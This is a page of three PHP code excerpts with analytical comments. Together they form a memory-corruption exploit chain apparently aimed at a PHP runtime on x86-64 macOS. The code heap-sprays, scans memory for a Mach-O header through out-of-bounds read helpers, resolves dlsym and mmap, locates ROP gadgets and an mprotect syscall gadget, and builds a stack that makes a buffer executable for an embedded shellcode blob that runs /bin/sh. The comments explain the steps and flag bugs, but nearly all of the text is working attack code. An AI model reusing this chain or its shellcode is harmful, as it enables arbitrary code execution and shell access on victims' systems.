Пример #1
/**
 * Locates a loaded executable image by scanning memory through the page's
 * out-of-bounds read helpers. ptr(), map(), nogc() and swapEndianness() are
 * not defined in this excerpt; the notes below assume map($addr, $len)
 * returns an array whose element 0 holds $len raw bytes read at $addr, and
 * that nogc() keeps a value alive against the collector (TODO confirm).
 *
 * Steps, as written:
 *   1. Push 0x2000 arrays of twelve 0x41414141 ints — a heap-groom / spray
 *      pattern, presumably to shape the heap before the read (and a useful
 *      detection signal in its own right).
 *   2. Read 0x10000 bytes at ptr(), hex-encode them and search for a fixed
 *      byte signature.
 *   3. 0x80 hex digits (0x40 bytes) past the hit, take 16 hex digits
 *      (8 bytes), reverse the byte order and treat the result as a
 *      little-endian pointer.
 *   4. Walk downward from that pointer in 0x100-byte steps, up to 0x100000
 *      probes, until the 8 bytes at the probe equal "cffaedfe07000001":
 *      little-endian 0xfeedfacf (the 64-bit Mach-O magic) followed by
 *      cputype 0x01000007 (x86-64) — i.e. the start of a Mach-O image.
 *
 * @return int|false  Address of the matching image header, or false when the
 *                    signature is absent or the downward scan exhausts its
 *                    budget.
 */
function rop_findexec()
{
    $x = [];
    // "+ 0" appears to force a plain integer copy of the helper's result
    // (exact reason depends on ptr()'s return type — not visible here).
    $p = ptr() + 0;
    for ($i = 0; $i < 0x2000; $i++) {
        array_push($x, [0x41414141, 0x41414141, 0x41414141, 0x41414141, 0x41414141, 0x41414141, 0x41414141, 0x41414141, 0x41414141, 0x41414141, 0x41414141, 0x41414141]);
    }
    $a = map($p, 0x10000)[0];
    nogc($a);
    // Everything below operates on the hex encoding, so offsets are in hex
    // digits (two per byte).
    $a = bin2hex($a);
    nogc($a);
    $r = strpos($a, "3100000000000000100000000f0000000c000000010000000c00000000000000");
    if ($r !== FALSE) {
        $a = substr($a, $r + 0x80, 0x10);
        // swapEndianness() presumably reverses byte pairs so hexdec() yields the
        // little-endian value; the width of the result is not checked here.
        $a = hexdec(swapEndianness($a));
        $a = $a + 0;
        for ($i = 0; $i < 0x100000; $i++) {
            // Probe 8 bytes at each 0x100-aligned address below the pointer.
            $k = map(($a & ~0xff) - 0x100 * $i, 0x8);
            if ("cffaedfe07000001" == bin2hex($k[0])) {
                return ($a & ~0xff) - 0x100 * $i + 0;
            }
        }
    }
    return FALSE;
}
Пример #2
    return ibuf($x, 8);
}
// Buffer that later receives the payload; $all['ptr'] (used further down) is
// assumed to be its address — alloc() is not defined in this excerpt.
$all = alloc(4096);
// Raw machine code kept as an opaque hex blob; presumably x86-64, matching
// the Mach-O cputype that rop_findexec() checks for. Not disassembled here.
$shellcode = hex2bin("415F4989E665488B0425080000004883C068488B204881EC08000100488D3D410000004883E4F0E82A000000488D3D3D0000004883E4F0FFD0488D3D2B0000004883E4F0E80D00000048C7C700000000FFD04C89F4C34889FE4831FF4883EF0241FFD7C373797374656D0065786974002F62696E2F736800");
// Image header address found by scanning memory (see rop_findexec()).
$addr = rop_findexec();
// nogc() is assumed to pin a value against garbage collection (not shown here).
nogc($addr);
$dlsym = getplt($addr, "_dlsym");
// get plt entry
nogc($dlsym);
$mmap_plt = getplt($addr, "_mmap");
// get plt entry
// Resolve the stub's real target: read the 32-bit displacement at stub+2 and
// add the address of the following instruction (stub+6) — the arithmetic is
// consistent with a 6-byte RIP-relative indirect jump. r32()/r64() are read
// primitives defined elsewhere on the page.
$mmap = r64(r32($mmap_plt + 2) + $mmap_plt + 6);
nogc($mmap);
// Locate the byte pattern of "mov eax, 0x200004a" inside the image containing
// mmap; per the author's note below, that immediate is the mprotect syscall
// number on the target platform.
$mprotect = gadget(findmhfromaddr($mmap), "b84a000002");
// find b84a000002      	movl	$0x200004a, %eax -> mprotect syscall
nogc($mprotect);
/**
 * Looks up the byte pattern $b inside the image at $a and returns the
 * resulting address packed as an 8-byte buffer. gadget() and ibuf() are
 * defined elsewhere on the page.
 */
function ig($a, $b)
{
    $location = gadget($a, $b);
    return ibuf($location, 8);
}
// Three "pop reg; ret" gadgets packed as 8-byte buffers by ig():
// 5f c3 = pop rdi; ret, 5e c3 = pop rsi; ret, 5a c3 = pop rdx; ret.
// The first two are searched in the image at $addr, the third in the image
// that contains mmap.
$arg1 = ig($addr, "5fc3");
$arg2 = ig($addr, "5ec3");
$arg3 = ig(findmhfromaddr($mmap), "5ac3");
// Fake stack for the chain. Each pop gadget loads the qword that follows it
// into an argument register, then control returns into the mprotect gadget
// with (page-aligned base of $all, two pages, 7); 7 is PROT_READ|PROT_WRITE|
// PROT_EXEC on common Unix ABIs. w64() (8-byte little-endian pack) and
// $all['ptr'] are assumed from elsewhere on the page. $stack is only built,
// not used, within this excerpt.
$stack = $arg1;
$stack .= w64($all['ptr'] & ~0xfff);   // rdi: buffer base rounded down to a 4 KiB page
$stack .= $arg2;
$stack .= w64(4096 * 2);               // rsi: length, two pages
$stack .= $arg3;
$stack .= w64(7);                      // rdx: protection bits
$stack .= w64($mprotect);              // return into the mprotect gadget
$stack .= w64($all['ptr']);            // presumably the address returned to afterwards
Пример #3
/**
 * Reads $sz bytes starting at $addr by fetching whole 16 MiB pages through
 * readpage() and concatenating single bytes. readpage() is defined elsewhere;
 * it is assumed to return an array whose element 0 can be indexed by the byte
 * offset within the 0x1000000-byte page (TODO confirm).
 *
 * As written, each iteration copies min($sz, 0x1000000) bytes out of the page
 * fetched for the current $addr, advances $addr by that amount, but decrements
 * $sz by a fixed 0x1000 regardless of how many bytes were copied; $page is
 * computed and never used.
 *
 * @param int $addr  start address
 * @param int $sz    number of bytes requested
 * @return string    the bytes read; passed through nogc() (semantics not shown
 *                   in this excerpt, presumably a keep-alive) before return
 */
function read($addr, $sz)
{
    $ret = "";
    // 16 MiB-aligned base of the first page; not referenced afterwards.
    $page = $addr & ~0xffffff;
    while ($sz > 0) {
        // Bytes to take from this page: at most one full page.
        $rsz = min($sz, 0xffffff + 1);
        $pg = readpage($addr);
        for ($i = 0; $i < $rsz; $i++) {
            // Index within the page is the low 24 bits of $addr plus $i.
            $ret .= $pg[0][($addr & 0xffffff) + $i];
        }
        $addr += $rsz;
        // Note the fixed 0x1000 step here versus $rsz above.
        $sz -= 0x1000;
    }
    nogc($ret);
    return $ret;
}